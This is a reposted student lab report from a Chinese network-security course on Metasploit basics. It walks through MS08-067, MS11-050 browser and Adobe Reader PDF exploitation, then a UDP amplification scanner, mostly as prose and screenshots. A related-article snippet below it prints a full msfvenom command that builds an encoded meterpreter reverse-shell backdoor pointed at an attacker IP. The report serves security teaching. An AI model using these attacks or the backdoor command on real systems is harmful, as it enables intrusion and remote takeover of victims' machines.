20145308 《网络对抗》 MSF基础应用 学习总结

MSF基础应用实战总结
最新推荐文章于 2025-07-17 14:07:49 发布
最新推荐文章于 2025-07-17 14:07:49 发布
阅读量110 收藏
点赞数
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/yg961022/p/6706420.html
本文介绍了使用Metasploit框架进行网络渗透测试的基础应用实践,包括MS08_067、MS11_050及Adobe Reader漏洞的攻击案例,详细记录了配置与实施过程,分享了个人的学习心得。

20145308 《网络对抗》 MSF基础应用 学习总结

实验内容

  • 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路。具体需要完成(1)一个主动攻击,如ms08_067;(2)一个针对浏览器的攻击,如ms11_050;(3)一个针对客户端的攻击,如Adobe(4)成功应用任何一个辅助模块

    基础问题回答

  • 用自己的话解释什么是exploit,payload,encode
  • exploit:让攻击方式能够发挥作用的通道,更像是没有子弹的枪,提供了攻击方式
  • payload:载荷,真正具有攻击能力的“子弹”

  • encode:编码,使恶意代码隐藏自己的属性,让攻击概率大大提高

    实验总结与体会

  • 这次实践我自己做了和别人不同的辅助模块,和别人不同就需要自己查看选择的辅助模块的解释,包括作用 攻击对象 配置的参数等相关信息,学会了自己看利用msf查看这些信息并对相应的靶机漏洞进行攻击行为,虽然多了麻烦,但也多了自己思考的过程,感觉对msf的了解也大大增加,也更加能通过这种借鉴别人然后自己尝试的方式学习到更多,比起之前照着步骤超级全的博客做出来的实践收获大,msf真的是一个好用的攻击软件,每次打开还显示不同的图?

    实践过程记录

    MS08_067漏洞渗透攻击

  • 开启MSF

  • 查询ms08_067漏洞
    884673-20170413215436611-556551688.png

  • 进入漏洞模块的应用,显示当前漏洞有效载荷
    884673-20170413215522720-786049040.png

  • 设置载荷,配置攻击机和靶机的IP地址参数
    884673-20170413215546783-402670904.png

  • exploit,等待攻击成功
    884673-20170413215553814-330207713.png

  • 还可以用meterpreter/reverse_tcp作为载荷攻击

  • 进入ms08_067漏洞,并设置载荷,设置相关参数
    884673-20170413215604783-371899266.png

  • exploit,获得shell,攻击成功
    884673-20170413215619798-1178370674.png

MS11-050安全漏洞

  • 开启msf

  • 进入漏洞,查看信息
    884673-20170413215649486-1601280035.png

  • 设置载荷,设置漏洞攻击所需要的IP、端口、网址
    884673-20170413215644142-1871253288.png

  • exploit,靶机访问设置好的网站
    884673-20170413215657267-2052155548.png

  • 连接成功
    884673-20170413215707580-203118211.png

  • 开始连接,获取权限
    884673-20170413215727955-2063368671.png

Adobe阅读器渗透攻击

  • 开启msf

  • 进入渗透模块应用,设置有效载荷
    884673-20170413215735470-1451400741.png

  • 配置需要的参数,攻击机IP、端口、生成文件名
    884673-20170413215741845-1128669992.png

  • exploit生成pdf文件,并复制到靶机中
    884673-20170413215749751-959139810.png

  • 返回并重新打开一个监听模块,设置载荷
    884673-20170413215758283-1855739639.png

  • 设置参数,攻击机IP、端口,与生成pdf的一致
    884673-20170413215814501-618233950.png

  • exploit,并打开靶机中的Pdf,等待连接
    884673-20170413215828892-99717145.png

  • 连接成功,显示靶机系统信息
    884673-20170413215834001-2108880398.png

  • 查看靶机TCP连接,有与设置的攻击机端口的连接
    884673-20170413215859298-372007467.png

  • 迁移当前靶机中pdf的进程至explorer.exe,获得靶机shell
    884673-20170413215904501-1845106906.png

成功应用任何一个辅助模块(创新部分)

  • 进入msf

  • 显示所有辅助模块
    884673-20170413215935345-747390164.png

  • 选择scanner/udp/udp_amplification
    884673-20170413220035408-664890597.png

  • 查看信息,该辅助模块是检查UDP与UDP放大漏洞
    884673-20170413220025830-1957894566.png

  • 设置所需参数
    884673-20170413220019220-1940510556.png

  • exploit
    884673-20170413220014314-903918971.png

转载于:https://www.cnblogs.com/yg961022/p/6706420.html

[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 1176
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
20155320《网络对抗MSF基础应用
weixin_30799995的博客
04-28 167
20155320《网络对抗MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode 于exploit,我觉得exploit是利用一些工具和方法,通过一些渠道知道某些操作系统存在的漏洞并对漏洞资料进行分析研究,从而获取到了被攻击者计算机的相关信息,或者是可以进行提权等超级用户的操作 payload 感觉就是一段代码,通过运行这个代码可以实现漏洞攻击 enc...
20145308网络对抗》 MAL_后门应用与实践 学习总结
weixin_30304375的博客
03-16 119
20145308网络对抗》 MAL_后门应用与实践 学习总结 实践目的 使用nc实现win和Linux间的后门连接 meterpreter的应用 MSF POST的应用 知识点学习总结 后门:一般指开发者预留的可以经过不正常的流程获得访问系统权限的通道 netcat可以收发TCP、UDP报文,与其他软件结合,可以实现后门效果 meterpreter可以生成有后门效果的可执行文件 基...
2018-2019-2 网络对抗技术 20165320 Exp5 MSF基础应用
weixin_33744854的博客
04-19 216
2018-2019-2 网络对抗技术 20165320 Exp5 MSF基础应用 一、实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 一个主动攻击实践:MS08-067(成功) 一个针对浏览器的攻击MS10_002_aurora(失败)、browser_autpwn2(成功)、vm_1漏洞系统BodgeIt(成功且唯一) 一个针对客...
2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用
weixin_34117211的博客
04-18 161
目录 Exp5 MSF基础应用 一、基础问题回答 二、攻击系统 ms08_067攻击(成功) 三、攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻击(失败,唯一) ...
网络信息安全设计及防护策略干货总结
ewii12567的博客
01-13 1685
网络信息安全的运行和防护不仅关系到整个数据中心业务系统稳定运行,同时,由于网络系统的多样性、复杂性、开放性、终端分布的不均匀性,致使网络极易遭到黑客、恶性软件或非法授权的入侵与攻击。鉴于数据信息的严肃性和敏感性,为了保障和加强系统安全,防止偶然因素和恶意原因破坏、更改、泄密,保障工作正常持续进行,同时,提高系统应对威胁和抵御攻击对抗能力和恢复能力,需要建设安全保障系统,满足信息安全等级保护的要求。使系统具有抵御和防范大规模、较强恶意攻击、较为严重的自然灾害、计算机病毒和恶意代码危害的能力;
聊聊网络安全行业学习思路
2401_84578953的博客
07-17 719
以网安从业者售前岗或项目经理岗为例,我们常面临这样的职业成长命题:岗位能力模型绝非单一技术维度可概括,它既要求对网络安全技术体系有深度认知,更需要将技术语言转化为业务价值;既要具备从战略层面规划企业安全防护体系的顶层设计能力,又要在具体项目中解决落地细节;既要精通技术文档的精准输出,更要擅长跨角色沟通。这种"技术-业务-管理-沟通"的多维能力交织,让许多从业者在学习成长中陷入困惑。
大模型在网络安全方面的应用汇总
白帽子佳奇的博客
09-01 3163
将LLMs融⼊⽹络安全的实践,⽆疑是⼀个颠覆性的举措,它正在彻底改变⽹络安全的⾯貌。LLMs不仅能够通过先进的算法来识别和修复软件中的漏洞,还能够通过⾃然语⾔处理技术来增强内容审核的准确性和效率。此外,LLMs在数据增强⽅⾯的应⽤为构建更加健壮的模型提供了可能,同时能够通过⾃动化和智能化的⼯具来增强⽹络安全专家的决策能⼒。尽管这些模型带来了新的⻛险,但不断的研究和安全措施的完善让我们能够更加有保障地利⽤它们的强⼤能⼒。
网络安全基础知识点汇总,值得收藏学习
2401_84215240的博客
07-17 754
相信大家都知道防火墙是干什么用的, 我觉得需要特别提醒一下,防火墙抵御的是外部的攻击,并不能对内部的病毒 ( 如ARP病毒 ) 或攻击没什么太大作用。
20165101刘天野 2018-2019-2《网络对抗技术》Exp5 MSF基础应用
weixin_30670965的博客
04-21 199
目录 20165101刘天野 2018-2019-2《网络对抗技术》Exp5 MSF基础应用 1. 实践内容 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050;(1分) 1.3 一个针对客户端的攻击,如Adobe;(1分) ...
网络基础-复习建议(包含红蓝对抗)
m0_60894143的博客
08-21 833
以下是网络方面最基础的知识,默认为都是要会应会必会的!!!常见的协议。。。。。有余力还可以继续延伸学习下。3、【自我测试题100道】一、建议复习顺序:网络基础-web漏洞-操作系统-数据库-中间件-编程-面试准备二、漏洞方面的学习平台:1、安全焦点BugTraq(一个出色的漏洞和Exploit数据源,可以通过CVE编号或者产品信息漏洞)直接搜索:http://www.fuzzysecurity.com/
网络安全领域红蓝对抗里关于红队全方位解析
qq_69775412的博客
07-11 1578
无论你的目标是成为一名优秀的渗透测试工程师,还是矢志成为影响整个行业的安全专家,保持学习的热情、与时俱进的态度以及对安全的热爱,都是在这个领域取得成功的关键。对于初级红队成员来说,最重要的是保持学习的热情,不断提升自己的技能。提到红队,似乎行内都会默认为红队就是攻击队,而蓝队则是防守队,大部分文章也会把红队解释为是一种全范围的多层攻击模拟,我们平常沟通确实也会这样说,而事实上,到底什么才是红队?这个阶段的红队成员应该注重实战经验的积累,参与更多的实际项目,同时不断学习新的技术和攻击方法。
最新RAG知识库问答的应用(非常详细)从零基础入门到精通,收藏这篇就够了
A1_3_9_7的博客
06-05 1007
在信息爆炸的时代,企业面临着如何有效获取和利用知识的问题。基于RAG(Retrieval-Augmented Generation)知识库问答的应用,正是解决这一挑战的重要手段。RAG结合了信息检索和文本生成的优势,能够在海量数据中快速提取相关信息,并生成高质量的回答。本文将探讨RAG知识库问答的业务方案及其在垂直应用领域的潜力。
2023最新简绘AI开源版支持MJ绘画,AI问答源码
09-12
简绘AI开源版,搭建教程如下 测试环境:Nginx+PHP7.4+MySQL5.6 上传直接安装即可
通用工具库组件,包括前后台判断,拦截器时间,心跳轮询库,Task任务库,二维码扫码库,转场动画库,通用TTS音频播放库,
09-12
通用工具库组件,包括前后台判断,拦截器时间,心跳轮询库,Task任务库,二维码扫码库,转场动画库,通用TTS音频播放库,国际化locale库等等.zip
一款基于MVVM架构的学习小项目,已经实现的功能有: 1.新闻和视频列表的查看 2.基于高德地图实现定位和城市搜索 3.
09-12
一款基于MVVM架构的学习小项目,已经实现的功能有: 1.新闻和视频列表的查看 2.基于高德地图实现定位和城市搜索 3.基于高德地图实现的城市天气查询 4.基于百度智能云实现网络图片、本地图片以及拍照图片的OCR识别。 5.实现记事本功能和待办功能 6.支持二维码扫一扫 7.支持在线版本更新.zip
QRCode(二维码).zip
09-12
QRCode(二维码).zip
二维码扫描(17).zip
最新发布
09-12
二维码扫描(17).zip
MSF基础与团队模型详解:原则、应用与CMMI比较
总结来说,MSF是一个全面的项目管理框架,它的基本原则、团队模型以及管理准则,都是为了帮助组织提高项目成功率,通过建立高效的沟通机制、明确的角色分工和有效的过程管理,确保项目的顺利进行。同时,它也强调...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值